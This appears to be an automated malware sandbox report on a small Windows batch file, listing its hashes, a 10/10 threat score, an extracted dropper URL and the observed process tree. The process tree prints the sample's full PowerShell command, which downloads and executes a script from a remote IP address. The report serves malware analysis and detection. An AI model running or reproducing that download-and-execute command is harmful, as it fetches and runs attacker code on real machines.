Analysis
-
max time kernel
132s -
max time network
73s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
02-06-2020 10:10
Static task
static1
Behavioral task
behavioral1
Sample
bd978ef89b238bfae52044568aa42c75.bat
Resource
win7v200430
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
bd978ef89b238bfae52044568aa42c75.bat
Resource
win10v200430
windows10_x64
0 signatures
0 seconds
General
-
Target
bd978ef89b238bfae52044568aa42c75.bat
-
Size
216B
-
MD5
f0df01a4173ce448321aea96ca779d4e
-
SHA1
ad432c315a539443f75f5c2456748c6e8b5d5c4f
-
SHA256
0152af15e9235a11368c7777e3d71e92c99fadbe9392a54acfab853445a9c50d
-
SHA512
08f9b9f0067ace92197239000cc1bed35239c6cfad5d60e2e388189b38affebd639a6e2c52e120e2cf8ba58c8e00b2035ff9536d00a41d844d8df68556504055
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/bd978ef89b238bfae52044568aa42c75
Signatures
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 1080 1420 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 1080 WerFault.exe Token: SeBackupPrivilege 1080 WerFault.exe Token: SeDebugPrivilege 1080 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
WerFault.exepid process 1080 WerFault.exe 1080 WerFault.exe 1080 WerFault.exe 1080 WerFault.exe 1080 WerFault.exe 1080 WerFault.exe 1080 WerFault.exe 1080 WerFault.exe 1080 WerFault.exe 1080 WerFault.exe 1080 WerFault.exe 1080 WerFault.exe 1080 WerFault.exe 1080 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\bd978ef89b238bfae52044568aa42c75.bat"1⤵PID:1152
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/bd978ef89b238bfae52044568aa42c75');Invoke-UNXZXCRBF;Start-Sleep -s 10000"2⤵PID:1420
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1420 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1080